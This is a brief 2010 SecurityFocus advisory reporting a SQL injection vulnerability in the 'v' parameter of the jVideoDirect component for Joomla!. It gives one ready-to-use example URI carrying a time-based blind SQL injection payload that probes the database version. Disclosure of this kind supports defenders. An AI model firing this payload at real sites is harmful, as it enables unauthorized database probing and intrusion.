jVideoDirect Component for Joomla! 'v' Parameter SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following example URI is available:

http://www.example.com/?v=NXRG9xz403238%27+AND%200=if(substring(@@version,1,1)=5,benchmark(9999999,md5(@@version)),0)%23


 

Privacy Statement
Copyright 2010, SecurityFocus